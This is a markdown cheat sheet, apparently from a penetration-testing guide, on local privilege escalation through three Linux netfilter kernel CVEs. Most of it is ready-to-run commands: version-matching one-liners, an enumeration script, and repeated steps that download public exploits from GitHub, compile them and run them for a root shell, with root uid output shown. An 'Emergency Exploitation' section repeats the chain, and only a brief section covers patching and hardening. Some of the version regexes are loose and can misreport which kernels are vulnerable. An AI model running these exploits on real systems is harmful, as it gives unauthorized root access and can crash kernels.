# Netfilter Kernel Exploits

## 🎯 Overview

Netfilter Linux kernel module vulnerabilities provide privilege escalation through kernel-level exploitation targeting specific vulnerable kernel versions (2.6-6.3.1).

## 🚨 Major Netfilter CVEs

### CVE-2021-22555 (Heap Out-of-Bounds)

* **Affected**: Linux kernels 2.6 - 5.11
* **Impact**: Local privilege escalation via heap corruption
* **Exploit**: Memory corruption in netfilter subsystem

### CVE-2022-25636 (Heap Out-of-Bounds Write)

* **Affected**: Linux kernels 5.4 - 5.6.10
* **Impact**: Root privileges via heap out-of-bounds write
* **Risk**: Can corrupt kernel, reboot required

### CVE-2023-32233 (Use-After-Free)

* **Affected**: Linux kernels up to 6.3.1
* **Impact**: Anonymous sets Use-After-Free in nf\_tables
* **Method**: Manipulating cleared anonymous sets

## 🔍 Kernel Version Detection

### Check Vulnerable Versions

```bash
# Check current kernel
uname -r

# CVE-2021-22555 check (2.6 - 5.11)
uname -r | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\." && echo "CVE-2021-22555 VULNERABLE"

# CVE-2022-25636 check (5.4 - 5.6.10)  
uname -r | grep -qE "^5\.[456]\." && echo "CVE-2022-25636 VULNERABLE"

# CVE-2023-32233 check (up to 6.3.1)
uname -r | grep -qE "^[1-5]\.|^6\.[0-3]\." && echo "CVE-2023-32233 VULNERABLE"
```

## 🚀 Exploitation Methods

### CVE-2021-22555 Exploitation

```bash
# Download exploit
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c

# Compile (32-bit static)
gcc -m32 -static exploit.c -o exploit

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)
```

### CVE-2022-25636 Exploitation

```bash
# Download exploit
git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636

# Compile and execute
make
./exploit

# ⚠️ WARNING: Can corrupt kernel!
```

### CVE-2023-32233 Exploitation

```bash
# Download exploit
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233

# Compile with required libraries
gcc -Wall -o exploit exploit.c -lmnl -lnftnl

# Execute for root shell
./exploit
# Result: uid=0(root) gid=0(root) groups=0(root)
```

## 🔍 Detection & Enumeration

### Netfilter Vulnerability Check

```bash
#!/bin/bash
echo "=== NETFILTER KERNEL EXPLOITS CHECK ==="

kernel=$(uname -r)
echo "Kernel version: $kernel"

# CVE-2021-22555 (2.6 - 5.11)
if echo "$kernel" | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\."; then
    echo "[!] CVE-2021-22555 VULNERABLE"
    echo "    Download: https://github.com/google/security-research"
fi

# CVE-2022-25636 (5.4 - 5.6.10)  
if echo "$kernel" | grep -qE "^5\.[456]\."; then
    echo "[!] CVE-2022-25636 VULNERABLE (CAUTION: Can corrupt kernel)"
    echo "    Download: https://github.com/Bonfee/CVE-2022-25636"
fi

# CVE-2023-32233 (up to 6.3.1)
if echo "$kernel" | grep -qE "^[1-5]\.|^6\.[0-3]\."; then
    echo "[!] CVE-2023-32233 VULNERABLE"
    echo "    Download: https://github.com/Liuk3r/CVE-2023-32233"
fi

echo "[+] Checking dependencies:"
which gcc 2>/dev/null && echo "GCC available"
dpkg -l | grep -E "(libmnl|libnftnl)" | head -2
```

### Netfilter Service Check

```bash
# Check if netfilter/iptables active
iptables -L 2>/dev/null | head -5
systemctl status netfilter-persistent 2>/dev/null
lsmod | grep netfilter
```

## 🔑 Quick Reference

### Immediate Checks

```bash
# Kernel vulnerability quick check
uname -r | grep -qE "^(2\.|3\.|4\.|5\.[0-9]|5\.1[01])\." && echo "CVE-2021-22555"
uname -r | grep -qE "^5\.[456]\." && echo "CVE-2022-25636"  
uname -r | grep -qE "^[1-5]\.|^6\.[0-3]\." && echo "CVE-2023-32233"

# Compilation capability
which gcc
```

### Emergency Exploitation

```bash
# CVE-2021-22555 (safest, wide range)
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploit

# CVE-2023-32233 (newer kernels)
git clone https://github.com/Liuk3r/CVE-2023-32233.git
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
./exploit
```

## ⚠️ Critical Warnings

### Kernel Exploit Risks

* **System instability** - Can crash the system
* **Kernel corruption** - May require reboot
* **Production danger** - Never run on production systems
* **Testing recommended** - Test in controlled environments

### Exploitation Considerations

* **CVE-2022-25636** - Highest risk of kernel corruption
* **CVE-2021-22555** - Most stable, widest kernel range
* **CVE-2023-32233** - Newest, targets recent kernels
* **Dependencies** - Some require specific libraries (libmnl, libnftnl)

## 🛡️ Defensive Measures

### Kernel Updates

```bash
# Check available kernel updates
apt list --upgradable | grep linux-image
dnf check-update kernel

# Update kernel (requires reboot)
sudo apt update && sudo apt upgrade linux-image-generic
```

### Netfilter Hardening

```bash
# Disable unnecessary netfilter modules
# Monitor kernel exploit attempts
# Implement kernel address space layout randomization (KASLR)
# Use grsecurity/PaX if available
```

***

*Netfilter kernel exploits target the network filtering subsystem - these kernel-level vulnerabilities provide direct root access but carry significant system stability risks and should be used with extreme caution.*